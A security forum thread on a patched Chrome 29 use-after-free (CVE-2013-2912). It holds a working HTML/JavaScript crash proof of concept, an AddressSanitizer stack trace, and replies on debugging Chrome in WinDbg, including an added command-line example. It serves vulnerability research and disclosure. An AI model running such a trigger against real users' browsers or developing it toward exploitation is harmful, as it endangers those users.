
Thread: Chrome 29.0.1547.57 NotifyInstanceWasDeleted Use After Free PoC

  1. #1 41.w4r10r (Garage Addict; Pune; joined Jul 2010; 338 posts; 3 blog entries)

    Chrome 29.0.1547.57 NotifyInstanceWasDeleted Use After Free PoC

    Hi,

    This is a PoC affecting Chrome 29.0.1547.57, Beta and Canary, which got patched in the last Chrome update.
    Reference: http://googlechromereleases.blogspot...el-update.html
    CVE-2013-2912

    The use-after-free vulnerability was in ppapi::proxy::PluginResource::NotifyInstanceWasDeleted and triggers with the ready state event and the DOMContentLoaded event; this issue also happens because a ready state event can be fired when loaders are cancelled within the DOMContentLoaded event.

    Code:
    <html>
    <body>
    <!-- Pepper PDF plugin instance; the referenced file does not need to exist -->
    <object id="pdf-viewer" src="filenotnecessary.pdf" type="application/pdf"></object>
    <script>
    var i = 0;
    var pdf;

    // First readystatechange (readyState "interactive", before DOMContentLoaded):
    // grab the plugin element.
    // Second readystatechange, fired while reload() is cancelling the plugin's
    // loaders from inside the DOMContentLoaded handler: re-append the element.
    // appendChild first removes it from its old parent, which tears down the
    // plugin instance and its PPAPI resources while the plugin is still in the
    // middle of reload() (see the stack trace in post #2).
    document.addEventListener('readystatechange', function() {
      if (i == 1) {
        document.body.appendChild(pdf);
      } else {
        pdf = document.getElementById("pdf-viewer");
      }
      i++;
    });

    // DOMContentLoaded: call into the plugin. Reloading cancels its loaders,
    // which re-enters the readystatechange handler above.
    window.addEventListener('DOMContentLoaded', function() {
      pdf.reload();
    });
    </script>
    </body>
    </html>

  2. #2 41.w4r10r (Garage Addict; Pune; joined Jul 2010; 338 posts; 3 blog entries)
    Detailed Stack Trace:

    Code:
    heap-use-after-free on address 0x61300002ddc8 at pc 0x7f763f509092 bp 0x7fff190c5360 sp 0x7fff190c5358 READ of size 8 at 0x61300002ddc8 thread T0 (chrome)
        #0 0x7f763f509091 in std::_Rb_tree<int, std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> >, std::_Select1st<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > >, std::less<int>, std::allocator<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > > >::_M_begin() /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/stl_tree.h:493
        #1 0x7f763f52f32e in std::_Rb_tree<int, std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> >, std::_Select1st<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > >, std::less<int>, std::allocator<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > > >::clear() /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/stl_tree.h:809
        #2 0x7f763d879420 in ppapi::ResourceTracker::DidDeleteInstance(int) out/Release/../../ppapi/shared_impl/resource_tracker.cc:160
        #3 0x7f763e84e9c3 in content::HostGlobals::InstanceDeleted(int) out/Release/../../content/renderer/pepper/host_globals.cc:257
        #4 0x7f763e5cc562 in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:563
        #5 0x7f763e5cc17d in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:524
        #6 0x7f763e8b36a7 in scoped_refptr<content::PepperPluginInstanceImpl>::operator=(content::PepperPluginInstanceImpl*) out/Release/../../base/memory/ref_counted.h:267
        #7 0x7f763e8b3887 in content::PepperWebPluginImpl::destroy() out/Release/../../content/renderer/pepper/pepper_webplugin_impl.cc:126
        #8 0x7f763fbfa03e in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:648
        #9 0x7f763fbf9edd in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:642
        #10 0x7f764236e0e3 in WTF::HashTable<WTF::RefPtr<WebCore::Widget>, WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*> >, WTF::PtrHash<WTF::RefPtr<WebCore::Widget> >, WTF::KeyValuePairHashTraits<WTF::HashTraits<WTF::RefPtr<WebCore::Widget> >, WTF::HashTraits<WebCore::FrameView*> >, WTF::HashTraits<WTF::RefPtr<WebCore::Widget> > >::deallocateTable(WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>*, int) out/Release/../../third_party/WebKit/Source/wtf/HashTable.h:876
        #11 0x7f7642367499 in WebCore::WidgetHierarchyUpdatesSuspensionScope::moveWidgets() out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.cpp:69
        #12 0x7f76416b7da9 in ~WidgetHierarchyUpdatesSuspensionScope out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.h:40
        #13 0x7f76416b2c2d in WebCore::ContainerNode::removeChild(WebCore::Node*, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:498
        #14 0x7f76416b14a0 in WebCore::collectChildrenAndRemoveFromOldParent(WebCore::Node*, WTF::Vector<WTF::RefPtr<WebCore::Node>, 11ul>&, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:70
        #15 0x7f76416b1139 in WebCore::ContainerNode::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:609
        #16 0x7f7641798fda in WebCore::Node::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/Node.cpp:543
        #17 0x7f7641e419c8 in WebCore::V8Node::appendChildMethodCustom(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/../../third_party/WebKit/Source/bindings/v8/custom/V8NodeCustom.cpp:120
        #18 0x7f7641d1773c in WebCore::NodeV8Internal::appendChildMethodCallbackForMainWorld(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/V8Node.cpp:703
        #19 0x7f763ebe2b77 in v8::internal::FunctionCallbackArguments::Call(v8::Handle<v8::Value> (*)(v8::Arguments const&)) out/Release/../../v8/src/arguments.cc:103
    addr2line: '': No such file
        #20 0x7f763ec07425 in v8::internal::MaybeObject* v8::internal::HandleApiCallHelper<false>(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1272
        #21 0x7f763ebfaf84 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1288
        #22 0x1a7a88f072ad in
    0x61300002ddc8 is located 72 bytes inside of 384-byte region [0x61300002dd80,0x61300002df00)
    freed by thread T0 (chrome) here:
        #0 0x7f763b0e9e95 in operator delete _asan_rtl_
        #1 0x7f763d876f9a in ppapi::Resource::NotifyInstanceWasDeleted() out/Release/../../ppapi/shared_impl/resource.cc:70
        #2 0x7f763f52e36d in ppapi::proxy::PluginResource::NotifyInstanceWasDeleted() out/Release/../../ppapi/proxy/plugin_resource.cc:62
        #3 0x7f763d879420 in ppapi::ResourceTracker::DidDeleteInstance(int) out/Release/../../ppapi/shared_impl/resource_tracker.cc:160
        #4 0x7f763e84e9c3 in content::HostGlobals::InstanceDeleted(int) out/Release/../../content/renderer/pepper/host_globals.cc:257
        #5 0x7f763e5cc562 in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:563
        #6 0x7f763e5cc17d in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:524
        #7 0x7f763e8b36a7 in scoped_refptr<content::PepperPluginInstanceImpl>::operator=(content::PepperPluginInstanceImpl*) out/Release/../../base/memory/ref_counted.h:267
        #8 0x7f763e8b3887 in content::PepperWebPluginImpl::destroy() out/Release/../../content/renderer/pepper/pepper_webplugin_impl.cc:126
        #9 0x7f763fbfa03e in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:648
        #10 0x7f763fbf9edd in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:642
        #11 0x7f764236e0e3 in WTF::HashTable<WTF::RefPtr<WebCore::Widget>, WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*> >, WTF::PtrHash<WTF::RefPtr<WebCore::Widget> >, WTF::KeyValuePairHashTraits<WTF::HashTraits<WTF::RefPtr<WebCore::Widget> >, WTF::HashTraits<WebCore::FrameView*> >, WTF::HashTraits<WTF::RefPtr<WebCore::Widget> > >::deallocateTable(WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>*, int) out/Release/../../third_party/WebKit/Source/wtf/HashTable.h:876
        #12 0x7f7642367499 in WebCore::WidgetHierarchyUpdatesSuspensionScope::moveWidgets() out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.cpp:69
        #13 0x7f76416b7da9 in ~WidgetHierarchyUpdatesSuspensionScope out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.h:40
        #14 0x7f76416b2c2d in WebCore::ContainerNode::removeChild(WebCore::Node*, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:498
        #15 0x7f76416b14a0 in WebCore::collectChildrenAndRemoveFromOldParent(WebCore::Node*, WTF::Vector<WTF::RefPtr<WebCore::Node>, 11ul>&, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:70
        #16 0x7f76416b1139 in WebCore::ContainerNode::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:609
        #17 0x7f7641798fda in WebCore::Node::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/Node.cpp:543
        #18 0x7f7641e419c8 in WebCore::V8Node::appendChildMethodCustom(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/../../third_party/WebKit/Source/bindings/v8/custom/V8NodeCustom.cpp:120
        #19 0x7f7641d1773c in WebCore::NodeV8Internal::appendChildMethodCallbackForMainWorld(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/V8Node.cpp:703
        #20 0x7f763ebe2b77 in v8::internal::FunctionCallbackArguments::Call(v8::Handle<v8::Value> (*)(v8::Arguments const&)) out/Release/../../v8/src/arguments.cc:103
        #21 0x7f763ec07425 in v8::internal::MaybeObject* v8::internal::HandleApiCallHelper<false>(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1272
        #22 0x7f763ebfaf84 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1288
        #23 0x1a7a88f072ad in
        #24 0x1a7a88f63a2e in
        #25 0x1a7a88f108b3 in
        #26 0x1a7a88f2acfd in
        #27 0x1a7a88f17e16 in
        #28 0x7f763ec77dd2 in v8::internal::Invoke(bool, v8::internal::Handle<v8::internal::JSFunction>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, bool*) out/Release/../../v8/src/execution.cc:119
        #29 0x7f763ebb9e78 in v8::Function::Call(v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) out/Release/../../v8/src/api.cc:4387
    previously allocated by thread T0 (chrome) here:
    Keep hunting for bugs

  3. #3

    How can you debug Chrome?

    Hi~
    I want to reproduce this bug. Can you tell me which debugger you use, and how to attach to Chrome?
    I tried to attach to it using OllyDbg or WinDbg but it did not work.
    Thanks

  4. #4 41.w4r10r (Garage Addict; Pune; joined Jul 2010; 338 posts; 3 blog entries)
    I am using WinDbg for analyzing crashes. For Chrome or any other sandboxed process debugging you need to tick a check box when you are executing the program under WinDbg.

    e.g.: Start WinDbg -> press Ctrl+E -> select the program you want to debug (c:\program files\google\chrome\application\chrome.exe) -> click on "Debug child processes also" (bottom of the box) -> click Open

    The above process will start Chrome under WinDbg. Now load your PoC into Chrome and you can see the crash under the debugger; now you can start analyzing it.
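    The same setup driven from the command line, as an added example that is not part of the original post or the poster's own procedure: WinDbg's `-o` switch is the command-line equivalent of the "Debug child processes also" check box, `-c` supplies the commands to run at the initial breakpoint, and `-y` points WinDbg at the Microsoft and Chrome public symbol servers so the crashing frame resolves to a function name rather than a module+offset. The install paths and the PoC file location are assumptions.

    ```powershell
    # Added example (not from the original post): launch Chrome under WinDbg
    # from PowerShell with child-process debugging, the command-line equivalent
    # of ticking "Debug child processes also" in the Ctrl+E dialog.
    # All paths below are assumptions; adjust them to the local install.
    $windbg = 'C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\windbg.exe'
    $chrome = 'C:\Program Files\Google\Chrome\Application\chrome.exe'
    $poc    = 'C:\poc\chrome-uaf.html'   # the PoC from post #1 saved to disk

    # Symbol path: Microsoft's server plus Chrome's public symbol server, so the
    # faulting frame shows a named function instead of module+offset.
    $symPath = 'srv*C:\symbols*https://msdl.microsoft.com/download/symbols;' +
               'srv*C:\symbols*https://chromium-browser-symsrv.commondatastorage.googleapis.com'

    # Commands WinDbg runs at the initial breakpoint:
    #   sxd ibp  - do not stop at the initial breakpoint of every child process
    #   sxe av   - break on first-chance access violations (the UAF surfaces as one)
    #   g        - let Chrome run and load the PoC
    $initCmds = 'sxd ibp; sxe av; g'

    # -o : debug child processes too. The renderer that loads the PoC is a
    #      child of the browser process, so without -o the crash is never seen.
    & $windbg -o -y $symPath -c $initCmds $chrome $poc

    # Once WinDbg breaks on the access violation, the usual first commands are:
    #   !analyze -v   crash summary with the faulting instruction and stack
    #   |             list all debugged processes and which one is current
    #   ~             list threads; the one that raised the exception is marked '#'
    #   kb            stack of the current thread
    ```

    If the frame still shows as module+offset after this, the symbol download failed (proxy, or a build for which Google did not publish symbols); `!sym noisy` followed by `.reload` shows which server request is failing.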

  5. #5

    One more problem

    Happy Christmas!
    Thanks for your reply~ but I have another question.
    I use XP SP3 + Chrome + WinDbg and I get the crash at: chrome_1c30000!RelaunchChromeBrowserWithNewCommandLineIfNeeded+0x94e13e:
    035395c9 807f1500 cmp byte ptr [edi+15h],0 ds:0023:fa60061b=??
    I want to know how you identify the thread which has the flaw?
    Please give me some advice.
